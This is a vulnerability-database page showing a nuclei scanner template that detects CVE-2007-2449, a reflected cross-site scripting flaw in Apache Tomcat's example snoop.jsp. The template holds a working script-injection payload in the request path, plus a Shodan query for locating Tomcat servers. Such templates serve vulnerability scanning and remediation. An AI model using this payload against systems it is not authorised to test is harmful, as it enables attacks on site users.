Lucene search
K

Apache Tomcat 4.x-7.x - Cross-Site Scripting

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 104 Views

Apache Tomcat 4.x-7.x cross-site scripting vulnerability allows arbitrary script execution in the browse

Related
Refs
Code
id: CVE-2007-2449

info:
  name: Apache Tomcat 4.x-7.x - Cross-Site Scripting
  author: pdteam,ritikchaddha
  severity: medium
  description: |
    Apache Tomcat 4.x through 7.x contains a cross-site scripting vulnerability which an attacker can use to execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: |
    Attackers can execute arbitrary scripts in victim browsers, leading to session hijacking, defacement, or redirection.
  reference:
    - https://vulners.com/securityvulns/SECURITYVULNS:DOC:17267
    - https://nvd.nist.gov/vuln/detail/CVE-2007-2449
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
    epss-score: 0.77376
    epss-percentile: 0.99498
  metadata:
    max-request: 1
    verified: true
    shodan-query: title:"Apache Tomcat"
  tags: cve,cve2007,apache,misconfig,tomcat,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Request URI: /examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp'
          - 'JSP Request Method'
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206875e810a9588d8ed5311499e1395e85fd714ea96116960db116e68b5df10fc2022100af8f3002e6d687f94c0445dba1dfe14729275fac2672dc0ea4acd4d83641d766:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.77376
104